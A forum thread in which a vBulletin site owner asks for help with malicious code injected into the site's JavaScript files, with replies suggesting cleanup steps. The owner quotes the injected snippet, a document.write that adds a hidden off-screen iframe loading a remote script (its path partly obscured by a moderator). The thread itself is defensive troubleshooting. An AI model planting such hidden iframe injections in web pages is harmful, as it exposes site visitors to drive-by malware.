Bump.

do you mean that they are appearing inside people's posts?
maybe you can just disallow HTML in posts.

if they are appearing on the actual site, then there must be a file somewhere on your server that is inserting them. it could be anything, anywhere... try looking for wierd stuff in a .htaccess file, or strange files that have been placed outside of your root.

Ok thanks.

It's injected in this file: /clientscript/vbulletin_global.js?v=386

This code:

document.write('<style>.x4chsze0 { position:absolute; left:-
1764px; top:-1518px} </style> <div class="x4chsze0"><iframe
src="http://example.cz.cc/********/counter.php?id=2"></
iframe></div>');

I have been looking how they do it but have not found anything so far.

[edited by: tedster at 5:43 am (utc) on May 7, 2011]
[edit reason] obscure the src to avoid malicious code [/edit]

there's probably another file that is inserting it into that file, even after you delete the reference.

if it was me, i would scrap that file completely. take out the bits that you need, and create a new .js file. give it a brand new name.

and then delete all the <script> bits that point to it in the template files. hard code a new URL into the <script> bis which point to your new file instead.

that way, even if you cant find out how the file is getting amended, it will never be delivered to the users.

I wish I could, but this is part of a script (vbulletin) and I have no idea how to tweak it. Also they have been injecting this code in other js files.

I think you may be right about there being another file on the server...

or maybe its in the database, can you search the database with something like phpmyadmin?

search for phrases that appear in the code, like "position:absolute"